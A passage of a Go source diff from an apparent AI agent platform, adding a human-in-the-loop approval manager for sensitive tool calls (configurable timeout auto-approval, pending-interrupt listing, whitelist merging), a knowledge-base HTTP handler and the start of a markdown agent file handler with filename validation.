m.db.Exec(`INSERT INTO hitl_conversation_configs + (conversation_id, enabled, mode, sensitive_tools, timeout_seconds, updated_at) + VALUES (?, ?, ?, ?, ?, ?) + ON CONFLICT(conversation_id) DO UPDATE SET + enabled=excluded.enabled, mode=excluded.mode, sensitive_tools=excluded.sensitive_tools, timeout_seconds=excluded.timeout_seconds, updated_at=excluded.updated_at`, + conversationID, boolToInt(req.Enabled), mode, string(tools), timeout, time.Now()) + return err +} + +func (m *HITLManager) LoadConversationConfig(conversationID string) (*HITLRequest, error) { + var enabledInt int + var mode, toolsJSON string + var timeout int + err := m.db.QueryRow(`SELECT enabled, mode, sensitive_tools, timeout_seconds FROM hitl_conversation_configs WHERE conversation_id = ?`, conversationID). + Scan(&enabledInt, &mode, &toolsJSON, &timeout) + if errors.Is(err, sql.ErrNoRows) { + return &HITLRequest{Enabled: false, Mode: "off", SensitiveTools: []string{}, TimeoutSeconds: 0}, nil + } + if err != nil { + return nil, err + } + if timeout < 0 { + timeout = 0 + } + tools := make([]string, 0) + _ = json.Unmarshal([]byte(toolsJSON), &tools) + return &HITLRequest{ + Enabled: enabledInt == 1, + Mode: mode, + SensitiveTools: tools, + TimeoutSeconds: timeout, + }, nil +} + +func (m *HITLManager) waitDecision(ctx context.Context, p *pendingInterrupt, timeout time.Duration) (hitlDecision, error) { + defer func() { + m.mu.Lock() + delete(m.pending, p.InterruptID) + m.mu.Unlock() + }() + var timeoutCh <-chan time.Time + if timeout > 0 { + timer := time.NewTimer(timeout) + defer timer.Stop() + timeoutCh = timer.C + } + select { + case d := <-p.decideCh: + // 只有 review_edit 模式允许改参;其他模式一律忽略 edited arguments + if p.Mode != "review_edit" && len(d.EditedArguments) > 0 { + d.EditedArguments = nil + } + _, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='decided', decision=?, decision_comment=?, decided_at=? WHERE id=?`, + d.Decision, d.Comment, time.Now(), p.InterruptID) + return d, nil + case <-timeoutCh: + _, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='approve', decision_comment='timeout auto approve', decided_at=? WHERE id=?`, + time.Now(), p.InterruptID) + return hitlDecision{Decision: "approve", Comment: "timeout auto approve"}, nil + case <-ctx.Done(): + _, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject', decision_comment='task cancelled', decided_at=? WHERE id=?`, + time.Now(), p.InterruptID) + return hitlDecision{Decision: "reject", Comment: "task cancelled"}, ctx.Err() + } +} + +func (h *AgentHandler) activateHITLForConversation(conversationID string, req *HITLRequest) { + if h.hitlManager == nil { + return + } + if req == nil { + cfg, err := h.hitlManager.LoadConversationConfig(conversationID) + if err == nil { + req = cfg + } + } + h.hitlManager.ActivateConversation(conversationID, h.hitlRequestWithMergedConfigWhitelist(req)) +} + +func (h *AgentHandler) waitHITLApproval(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID, toolName, toolCallID string, payload map[string]interface{}, sendEventFunc func(eventType, message string, data interface{})) (*hitlDecision, error) { + cfg, need := h.hitlManager.shouldInterrupt(conversationID, toolName) + if !need { + return nil, nil + } + payloadRaw, _ := json.Marshal(payload) + p, err := h.hitlManager.CreatePendingInterrupt(conversationID, assistantMessageID, cfg.Mode, toolName, toolCallID, string(payloadRaw)) + if err != nil { + h.logger.Warn("创建 HITL 中断失败", zap.Error(err)) + return nil, err + } + if sendEventFunc != nil { + sendEventFunc("hitl_interrupt", "命中人机协同审批", map[string]interface{}{ + "conversationId": conversationID, + "interruptId": p.InterruptID, + "mode": cfg.Mode, + "toolName": toolName, + "toolCallId": toolCallID, + "payload": payload, + }) + } + d, waitErr := h.hitlManager.waitDecision(runCtx, p, cfg.Timeout) + if waitErr != nil { + if cancelRun != nil && (errors.Is(waitErr, context.Canceled) || errors.Is(waitErr, context.DeadlineExceeded)) { + cause := context.Cause(runCtx) + switch { + case errors.Is(cause, ErrTaskCancelled): + cancelRun(ErrTaskCancelled) + case cause != nil: + cancelRun(cause) + case errors.Is(waitErr, context.DeadlineExceeded): + cancelRun(context.DeadlineExceeded) + default: + cancelRun(ErrTaskCancelled) + } + } + return nil, waitErr + } + if d.Decision == "reject" { + if sendEventFunc != nil { + sendEventFunc("hitl_rejected", "人工拒绝本次工具调用,模型将基于反馈继续迭代", map[string]interface{}{ + "conversationId": conversationID, + "interruptId": p.InterruptID, + "toolName": toolName, + "comment": d.Comment, + }) + } + return &d, nil + } + if sendEventFunc != nil { + sendEventFunc("hitl_resumed", "人工确认通过,继续执行", map[string]interface{}{ + "conversationId": conversationID, + "interruptId": p.InterruptID, + "toolName": toolName, + "comment": d.Comment, + "editedArgs": d.EditedArguments, + }) + } + return &d, nil +} + +func (h *AgentHandler) handleHITLToolCall(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID string, data map[string]interface{}, sendEventFunc func(eventType, message string, data interface{})) { + if h.hitlManager == nil { + return + } + toolName, _ := data["toolName"].(string) + toolCallID, _ := data["toolCallId"].(string) + d, err := h.waitHITLApproval(runCtx, cancelRun, conversationID, assistantMessageID, toolName, toolCallID, data, sendEventFunc) + if err != nil || d == nil { + return + } + if len(d.EditedArguments) > 0 { + if argsObj, ok := data["argumentsObj"].(map[string]interface{}); ok { + for k := range argsObj { + delete(argsObj, k) + } + for k, v := range d.EditedArguments { + argsObj[k] = v + } + if b, mErr := json.Marshal(argsObj); mErr == nil { + data["arguments"] = string(b) + } + } + } +} + +func (h *AgentHandler) ListHITLPending(c *gin.Context) { + conversationID := strings.TrimSpace(c.Query("conversationId")) + status := strings.TrimSpace(c.Query("status")) + if status == "" { + status = "pending" + } + page, _ := strconv.Atoi(c.DefaultQuery("page", "1")) + if page < 1 { + page = 1 + } + pageSize, _ := strconv.Atoi(c.DefaultQuery("pageSize", "20")) + pageSize = int(math.Max(1, math.Min(float64(pageSize), 200))) + offset := (page - 1) * pageSize + q := `SELECT id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, decision, decision_comment, created_at, decided_at FROM hitl_interrupts WHERE 1=1` + args := []interface{}{} + if conversationID != "" { + q += " AND conversation_id = ?" + args = append(args, conversationID) + } + if status != "all" { + q += " AND status = ?" + args = append(args, status) + } + q += " ORDER BY created_at DESC LIMIT ? OFFSET ?" + args = append(args, pageSize, offset) + rows, err := h.db.Query(q, args...) + if err != nil { + c.JSON(500, gin.H{"error": err.Error()}) + return + } + defer rows.Close() + items := make([]map[string]interface{}, 0) + for rows.Next() { + var id, cid, mode, toolName, toolCallID, payload, rowStatus string + var messageID sql.NullString + var decision, comment sql.NullString + var createdAt time.Time + var decidedAt sql.NullTime + if err := rows.Scan(&id, &cid, &messageID, &mode, &toolName, &toolCallID, &payload, &rowStatus, &decision, &comment, &createdAt, &decidedAt); err != nil { + continue + } + msgID := "" + if messageID.Valid { + msgID = messageID.String + } + items = append(items, map[string]interface{}{ + "id": id, + "conversationId": cid, + "messageId": msgID, + "mode": mode, + "toolName": toolName, + "toolCallId": toolCallID, + "payload": payload, + "status": rowStatus, + "decision": decision.String, + "comment": comment.String, + "createdAt": createdAt, + "decidedAt": func() interface{} { + if decidedAt.Valid { + return decidedAt.Time + } + return nil + }(), + }) + } + c.JSON(http.StatusOK, gin.H{"items": items, "page": page, "pageSize": pageSize}) +} + +type hitlDecisionReq struct { + InterruptID string `json:"interruptId" binding:"required"` + Decision string `json:"decision" binding:"required"` + Comment string `json:"comment,omitempty"` + EditedArguments map[string]interface{} `json:"editedArguments,omitempty"` +} + +func (h *AgentHandler) DecideHITLInterrupt(c *gin.Context) { + var req hitlDecisionReq + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(400, gin.H{"error": err.Error()}) + return + } + if h.hitlManager == nil { + c.JSON(500, gin.H{"error": "hitl manager unavailable"}) + return + } + if err := h.hitlManager.ResolveInterrupt(req.InterruptID, req.Decision, req.Comment, req.EditedArguments); err != nil { + c.JSON(http.StatusConflict, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "hitl", "decision", "HITL 审批决策", "hitl_interrupt", req.InterruptID, map[string]interface{}{ + "decision": req.Decision, + }) + } + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +func (h *AgentHandler) DismissHITLInterrupt(c *gin.Context) { + var req struct { + InterruptID string `json:"interruptId" binding:"required"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(400, gin.H{"error": err.Error()}) + return + } + if h.hitlManager == nil { + c.JSON(500, gin.H{"error": "hitl manager unavailable"}) + return + } + res, err := h.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject', + decision_comment='dismissed by user', decided_at=CURRENT_TIMESTAMP + WHERE id=? AND status='pending'`, req.InterruptID) + if err != nil { + c.JSON(500, gin.H{"error": err.Error()}) + return + } + n, _ := res.RowsAffected() + if n == 0 { + c.JSON(404, gin.H{"error": "interrupt not found or already resolved"}) + return + } + // Also drain from in-memory map if present + h.hitlManager.mu.Lock() + if p, ok := h.hitlManager.pending[req.InterruptID]; ok { + delete(h.hitlManager.pending, req.InterruptID) + select { + case p.decideCh <- hitlDecision{Decision: "reject", Comment: "dismissed by user"}: + default: + } + } + h.hitlManager.mu.Unlock() + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +func (h *AgentHandler) interceptHITLForEinoTool(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID string, sendEventFunc func(eventType, message string, data interface{}), toolName, arguments string) (string, error) { + payload := map[string]interface{}{ + "toolName": toolName, + "arguments": arguments, + "source": "eino_middleware", + "toolCallId": "", + } + var argsObj map[string]interface{} + if strings.TrimSpace(arguments) != "" { + _ = json.Unmarshal([]byte(arguments), &argsObj) + if argsObj != nil { + payload["argumentsObj"] = argsObj + } + } + d, err := h.waitHITLApproval(runCtx, cancelRun, conversationID, assistantMessageID, toolName, "", payload, sendEventFunc) + if err != nil || d == nil { + return arguments, err + } + if d.Decision == "reject" { + return arguments, multiagent.NewHumanRejectError(d.Comment) + } + if len(d.EditedArguments) > 0 { + edited, mErr := json.Marshal(d.EditedArguments) + if mErr == nil { + return string(edited), nil + } + } + return arguments, nil +} + + +type hitlConfigReq struct { + ConversationID string `json:"conversationId" binding:"required"` + HITLRequest +} + +func (h *AgentHandler) GetHITLConversationConfig(c *gin.Context) { + conversationID := strings.TrimSpace(c.Param("conversationId")) + if conversationID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"}) + return + } + cfg, err := h.hitlManager.LoadConversationConfig(conversationID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if !hitlStoredConfigEffective(cfg) { + if pendMode, ok := h.hitlManager.PendingHITLInterruptMode(conversationID); ok { + cfg2 := *cfg + cfg2.Enabled = true + cfg2.Mode = normalizeHitlMode(pendMode) + if cfg2.TimeoutSeconds < 0 { + cfg2.TimeoutSeconds = 0 + } + cfg = &cfg2 + } + } + c.JSON(http.StatusOK, gin.H{ + "conversationId": conversationID, + "hitl": cfg, + "hitlGlobalToolWhitelist": h.hitlConfigGlobalToolWhitelist(), + }) +} + +func (h *AgentHandler) UpsertHITLConversationConfig(c *gin.Context) { + var req hitlConfigReq + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + req.Mode = normalizeHitlMode(req.Mode) + if err := h.hitlManager.SaveConversationConfig(req.ConversationID, &req.HITLRequest); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.hitlWhitelistSaver != nil && len(req.SensitiveTools) > 0 { + if err := h.hitlWhitelistSaver.MergeHitlToolWhitelistIntoConfig(req.SensitiveTools); err != nil { + h.logger.Warn("HITL 会话配置已保存,但合并工具白名单到 config.yaml 失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{ + "error": "会话配置已保存,但写入 config.yaml 失败: " + err.Error(), + }) + return + } + } + h.hitlManager.ActivateConversation(req.ConversationID, h.hitlRequestWithMergedConfigWhitelist(&req.HITLRequest)) + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +type mergeHitlGlobalWhitelistReq struct { + SensitiveTools []string `json:"sensitiveTools"` +} + +// MergeHITLGlobalToolWhitelist 无会话 ID 时将侧栏提交的免审批工具合并进 config.yaml(与 PUT /hitl/config 中白名单落盘规则一致)。 +func (h *AgentHandler) MergeHITLGlobalToolWhitelist(c *gin.Context) { + if h.hitlWhitelistSaver == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "HITL 配置持久化不可用"}) + return + } + var req mergeHitlGlobalWhitelistReq + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if len(req.SensitiveTools) == 0 { + c.JSON(http.StatusOK, gin.H{ + "ok": true, + "hitlGlobalToolWhitelist": h.hitlConfigGlobalToolWhitelist(), + "hitlGlobalWhitelistMerged": false, + }) + return + } + if err := h.hitlWhitelistSaver.MergeHitlToolWhitelistIntoConfig(req.SensitiveTools); err != nil { + h.logger.Warn("合并 HITL 工具白名单到 config.yaml 失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "ok": true, + "hitlGlobalToolWhitelist": h.hitlConfigGlobalToolWhitelist(), + "hitlGlobalWhitelistMerged": true, + }) +} + +func boolToInt(v bool) int { + if v { + return 1 + } + return 0 +} diff --git a/internal/handler/knowledge.go b/internal/handler/knowledge.go new file mode 100644 index 00000000..eee106ac --- /dev/null +++ b/internal/handler/knowledge.go @@ -0,0 +1,530 @@ +package handler + +import ( + "context" + "fmt" + "net/http" + "time" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/knowledge" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// KnowledgeHandler 知识库处理器 +type KnowledgeHandler struct { + manager *knowledge.Manager + retriever *knowledge.Retriever + indexer *knowledge.Indexer + db *database.DB + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *KnowledgeHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewKnowledgeHandler 创建新的知识库处理器 +func NewKnowledgeHandler( + manager *knowledge.Manager, + retriever *knowledge.Retriever, + indexer *knowledge.Indexer, + db *database.DB, + logger *zap.Logger, +) *KnowledgeHandler { + return &KnowledgeHandler{ + manager: manager, + retriever: retriever, + indexer: indexer, + db: db, + logger: logger, + } +} + +// GetCategories 获取所有分类 +func (h *KnowledgeHandler) GetCategories(c *gin.Context) { + categories, err := h.manager.GetCategories() + if err != nil { + h.logger.Error("获取分类失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"categories": categories}) +} + +// GetItems 获取知识项列表(支持按分类分页和关键字搜索,默认不返回完整内容) +func (h *KnowledgeHandler) GetItems(c *gin.Context) { + category := c.Query("category") + searchKeyword := c.Query("search") // 搜索关键字 + + // 如果提供了搜索关键字,执行关键字搜索(在所有数据中搜索) + if searchKeyword != "" { + items, err := h.manager.SearchItemsByKeyword(searchKeyword, category) + if err != nil { + h.logger.Error("搜索知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 按分类分组结果 + groupedByCategory := make(map[string][]*knowledge.KnowledgeItemSummary) + for _, item := range items { + cat := item.Category + if cat == "" { + cat = "未分类" + } + groupedByCategory[cat] = append(groupedByCategory[cat], item) + } + + // 转换为 CategoryWithItems 格式 + categoriesWithItems := make([]*knowledge.CategoryWithItems, 0, len(groupedByCategory)) + for cat, catItems := range groupedByCategory { + categoriesWithItems = append(categoriesWithItems, &knowledge.CategoryWithItems{ + Category: cat, + ItemCount: len(catItems), + Items: catItems, + }) + } + + // 按分类名称排序 + for i := 0; i < len(categoriesWithItems)-1; i++ { + for j := i + 1; j < len(categoriesWithItems); j++ { + if categoriesWithItems[i].Category > categoriesWithItems[j].Category { + categoriesWithItems[i], categoriesWithItems[j] = categoriesWithItems[j], categoriesWithItems[i] + } + } + } + + c.JSON(http.StatusOK, gin.H{ + "categories": categoriesWithItems, + "total": len(categoriesWithItems), + "search": searchKeyword, + "is_search": true, + }) + return + } + + // 分页模式:categoryPage=true 表示按分类分页,否则按项分页(向后兼容) + categoryPageMode := c.Query("categoryPage") != "false" // 默认使用分类分页 + + // 分页参数 + limit := 50 // 默认每页 50 条(分类分页时为分类数,项分页时为项数) + offset := 0 + if limitStr := c.Query("limit"); limitStr != "" { + if parsed, err := parseInt(limitStr); err == nil && parsed > 0 && parsed <= 500 { + limit = parsed + } + } + if offsetStr := c.Query("offset"); offsetStr != "" { + if parsed, err := parseInt(offsetStr); err == nil && parsed >= 0 { + offset = parsed + } + } + + // 如果指定了 category 参数,且使用分类分页模式,则只返回该分类 + if category != "" && categoryPageMode { + // 单分类模式:返回该分类的所有知识项(不分页) + items, total, err := h.manager.GetItemsSummary(category, 0, 0) + if err != nil { + h.logger.Error("获取知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 包装成分类结构 + categoriesWithItems := []*knowledge.CategoryWithItems{ + { + Category: category, + ItemCount: total, + Items: items, + }, + } + + c.JSON(http.StatusOK, gin.H{ + "categories": categoriesWithItems, + "total": 1, // 只有一个分类 + "limit": limit, + "offset": offset, + }) + return + } + + if categoryPageMode { + // 按分类分页模式(默认) + // limit 表示每页分类数,推荐 5-10 个分类 + if limit <= 0 || limit > 100 { + limit = 10 // 默认每页 10 个分类 + } + + categoriesWithItems, totalCategories, err := h.manager.GetCategoriesWithItems(limit, offset) + if err != nil { + h.logger.Error("获取分类知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "categories": categoriesWithItems, + "total": totalCategories, + "limit": limit, + "offset": offset, + }) + return + } + + // 按项分页模式(向后兼容) + // 是否包含完整内容(默认 false,只返回摘要) + includeContent := c.Query("includeContent") == "true" + + if includeContent { + // 返回完整内容(向后兼容) + items, err := h.manager.GetItemsWithOptions(category, limit, offset, true) + if err != nil { + h.logger.Error("获取知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 获取总数 + total, err := h.manager.GetItemsCount(category) + if err != nil { + h.logger.Warn("获取知识项总数失败", zap.Error(err)) + total = len(items) + } + + c.JSON(http.StatusOK, gin.H{ + "items": items, + "total": total, + "limit": limit, + "offset": offset, + }) + } else { + // 返回摘要(不包含完整内容,推荐方式) + items, total, err := h.manager.GetItemsSummary(category, limit, offset) + if err != nil { + h.logger.Error("获取知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "items": items, + "total": total, + "limit": limit, + "offset": offset, + }) + } +} + +// GetItem 获取单个知识项 +func (h *KnowledgeHandler) GetItem(c *gin.Context) { + id := c.Param("id") + + item, err := h.manager.GetItem(id) + if err != nil { + h.logger.Error("获取知识项失败", zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, item) +} + +// CreateItem 创建知识项 +func (h *KnowledgeHandler) CreateItem(c *gin.Context) { + var req struct { + Category string `json:"category" binding:"required"` + Title string `json:"title" binding:"required"` + Content string `json:"content" binding:"required"` + } + + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + item, err := h.manager.CreateItem(req.Category, req.Title, req.Content) + if err != nil { + h.logger.Error("创建知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 异步索引 + go func() { + ctx := context.Background() + if err := h.indexer.IndexItem(ctx, item.ID); err != nil { + h.logger.Warn("索引知识项失败", zap.String("itemId", item.ID), zap.Error(err)) + } + }() + + c.JSON(http.StatusOK, item) +} + +// UpdateItem 更新知识项 +func (h *KnowledgeHandler) UpdateItem(c *gin.Context) { + id := c.Param("id") + + var req struct { + Category string `json:"category" binding:"required"` + Title string `json:"title" binding:"required"` + Content string `json:"content" binding:"required"` + } + + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + item, err := h.manager.UpdateItem(id, req.Category, req.Title, req.Content) + if err != nil { + h.logger.Error("更新知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 异步重新索引 + go func() { + ctx := context.Background() + if err := h.indexer.IndexItem(ctx, item.ID); err != nil { + h.logger.Warn("重新索引知识项失败", zap.String("itemId", item.ID), zap.Error(err)) + } + }() + + c.JSON(http.StatusOK, item) +} + +// DeleteItem 删除知识项 +func (h *KnowledgeHandler) DeleteItem(c *gin.Context) { + id := c.Param("id") + + if err := h.manager.DeleteItem(id); err != nil { + h.logger.Error("删除知识项失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.RecordOK(c, "knowledge", "item_delete", "删除知识项", "knowledge_item", id, nil) + } + c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) +} + +// RebuildIndex 重建索引 +func (h *KnowledgeHandler) RebuildIndex(c *gin.Context) { + // 异步重建索引 + go func() { + ctx := context.Background() + if err := h.indexer.RebuildIndex(ctx); err != nil { + h.logger.Error("重建索引失败", zap.Error(err)) + } + }() + + if h.audit != nil { + h.audit.RecordOK(c, "knowledge", "index_rebuild", "重建知识库索引", "knowledge", "", nil) + } + c.JSON(http.StatusOK, gin.H{"message": "索引重建已开始,将在后台进行"}) +} + +// ScanKnowledgeBase 扫描知识库 +func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) { + itemsToIndex, err := h.manager.ScanKnowledgeBase() + if err != nil { + h.logger.Error("扫描知识库失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if len(itemsToIndex) == 0 { + c.JSON(http.StatusOK, gin.H{"message": "扫描完成,没有需要索引的新项或更新项"}) + return + } + + // 异步索引新添加或更新的项(增量索引) + go func() { + ctx := context.Background() + h.logger.Info("开始增量索引", zap.Int("count", len(itemsToIndex))) + failedCount := 0 + consecutiveFailures := 0 + var firstFailureItemID string + var firstFailureError error + + for i, itemID := range itemsToIndex { + if err := h.indexer.IndexItem(ctx, itemID); err != nil { + failedCount++ + consecutiveFailures++ + + // 只在第一个失败时记录详细日志 + if consecutiveFailures == 1 { + firstFailureItemID = itemID + firstFailureError = err + h.logger.Warn("索引知识项失败", + zap.String("itemId", itemID), + zap.Int("totalItems", len(itemsToIndex)), + zap.Error(err), + ) + } + + // 如果连续失败 2 次,立即停止增量索引 + if consecutiveFailures >= 2 { + h.logger.Error("连续索引失败次数过多,立即停止增量索引", + zap.Int("consecutiveFailures", consecutiveFailures), + zap.Int("totalItems", len(itemsToIndex)), + zap.Int("processedItems", i+1), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + break + } + continue + } + + // 成功时重置连续失败计数 + if consecutiveFailures > 0 { + consecutiveFailures = 0 + firstFailureItemID = "" + firstFailureError = nil + } + + // 减少进度日志频率 + if (i+1)%10 == 0 || i+1 == len(itemsToIndex) { + h.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemsToIndex)), zap.Int("failed", failedCount)) + } + } + h.logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount)) + }() + + c.JSON(http.StatusOK, gin.H{ + "message": fmt.Sprintf("扫描完成,开始索引 %d 个新添加或更新的知识项", len(itemsToIndex)), + "items_to_index": len(itemsToIndex), + }) +} + +// GetRetrievalLogs 获取检索日志 +func (h *KnowledgeHandler) GetRetrievalLogs(c *gin.Context) { + conversationID := c.Query("conversationId") + messageID := c.Query("messageId") + limit := 50 // 默认 50 条 + + if limitStr := c.Query("limit"); limitStr != "" { + if parsed, err := parseInt(limitStr); err == nil && parsed > 0 { + limit = parsed + } + } + + logs, err := h.manager.GetRetrievalLogs(conversationID, messageID, limit) + if err != nil { + h.logger.Error("获取检索日志失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"logs": logs}) +} + +// DeleteRetrievalLog 删除检索日志 +func (h *KnowledgeHandler) DeleteRetrievalLog(c *gin.Context) { + id := c.Param("id") + + if err := h.manager.DeleteRetrievalLog(id); err != nil { + h.logger.Error("删除检索日志失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) +} + +// GetIndexStatus 获取索引状态 +func (h *KnowledgeHandler) GetIndexStatus(c *gin.Context) { + status, err := h.manager.GetIndexStatus() + if err != nil { + h.logger.Error("获取索引状态失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 获取索引器的错误信息 + if h.indexer != nil { + lastError, lastErrorTime := h.indexer.GetLastError() + if lastError != "" { + // 如果错误是最近发生的(5 分钟内),则返回错误信息 + if time.Since(lastErrorTime) < 5*time.Minute { + status["last_error"] = lastError + status["last_error_time"] = lastErrorTime.Format(time.RFC3339) + } + } + + // 获取重建索引状态 + isRebuilding, totalItems, current, failed, lastItemID, lastChunks, startTime := h.indexer.GetRebuildStatus() + if isRebuilding { + status["is_rebuilding"] = true + status["rebuild_total"] = totalItems + status["rebuild_current"] = current + status["rebuild_failed"] = failed + status["rebuild_start_time"] = startTime.Format(time.RFC3339) + if lastItemID != "" { + status["rebuild_last_item_id"] = lastItemID + } + if lastChunks > 0 { + status["rebuild_last_chunks"] = lastChunks + } + // 重建中时,is_complete 为 false + status["is_complete"] = false + // 计算重建进度百分比 + if totalItems > 0 { + status["progress_percent"] = float64(current) / float64(totalItems) * 100 + } + } + } + + c.JSON(http.StatusOK, status) +} + +// Search 搜索知识库(用于 API 调用,Agent 内部使用 Retriever) +func (h *KnowledgeHandler) Search(c *gin.Context) { + var req knowledge.SearchRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // Retriever.Search 经 Eino VectorEinoRetriever,与 MCP 工具链一致。 + results, err := h.retriever.Search(c.Request.Context(), &req) + if err != nil { + h.logger.Error("搜索知识库失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"results": results}) +} + +// GetStats 获取知识库统计信息 +func (h *KnowledgeHandler) GetStats(c *gin.Context) { + totalCategories, totalItems, err := h.manager.GetStats() + if err != nil { + h.logger.Error("获取知识库统计信息失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "enabled": true, + "total_categories": totalCategories, + "total_items": totalItems, + }) +} + +// 辅助函数:解析整数 +func parseInt(s string) (int, error) { + var result int + _, err := fmt.Sscanf(s, "%d", &result) + return result, err +} diff --git a/internal/handler/markdown_agents.go b/internal/handler/markdown_agents.go new file mode 100644 index 00000000..70ba216d --- /dev/null +++ b/internal/handler/markdown_agents.go @@ -0,0 +1,333 @@ +package handler + +import ( + "fmt" + "net/http" + "os" + "path/filepath" + "regexp" + "strings" + + "cyberstrike-ai/internal/agents" + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + + "github.com/gin-gonic/gin" +) + +var markdownAgentFilenameRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9_.-]*\.md$`) + +// MarkdownAgentsHandler 管理 agents 目录下子代理 Markdown(增删改查)。 +type MarkdownAgentsHandler struct { + dir string + audit *audit.Service +} + +// NewMarkdownAgentsHandler dir 须为已解析的绝对路径。 +func NewMarkdownAgentsHandler(dir string) *MarkdownAgentsHandler { + return &MarkdownAgentsHandler{dir: strings.TrimSpace(dir)} +} + +// SetAudit wires platform audit logging. +func (h *MarkdownAgentsHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +func (h *MarkdownAgentsHandler) safeJoin(filename string) (string, error) { + filename = strings.TrimSpace(filename) + if filename == "" || !markdownAgentFilenameRe.MatchString(filename) { + return "", fmt.Errorf("非法文件名") + } + clean := filepath.Clean(filename) + if clean != filename || strings.Contains(clean, "..") { + return "", fmt.Errorf("非法文件名") + } + return filepath.Join(h.dir, clean), nil +} + +// existingOtherOrchestrator 若目录中已有同槽位的其他主代理文件,返回其文件名;writingBasename 为当前正在写入的文件名时不冲突。 +func existingOtherOrchestrator(dir, writingBasename string) (other string, err error) { + load, err := agents.LoadMarkdownAgentsDir(dir) + if err != nil { + return "", err + } + wb := filepath.Base(strings.TrimSpace(writingBasename)) + switch agents.OrchestratorMarkdownKind(wb) { + case "plan_execute": + if load.OrchestratorPlanExecute != nil && !strings.EqualFold(load.OrchestratorPlanExecute.Filename, wb) { + return load.OrchestratorPlanExecute.Filename, nil + } + case "supervisor": + if load.OrchestratorSupervisor != nil && !strings.EqualFold(load.OrchestratorSupervisor.Filename, wb) { + return load.OrchestratorSupervisor.Filename, nil + } + case "deep": + if load.Orchestrator != nil && !strings.EqualFold(load.Orchestrator.Filename, wb) { + return load.Orchestrator.Filename, nil + } + default: + if load.Orchestrator != nil && !strings.EqualFold(load.Orchestrator.Filename, wb) { + return load.Orchestrator.Filename, nil + } + } + return "", nil +} + +// ListMarkdownAgents GET /api/multi-agent/markdown-agents +func (h 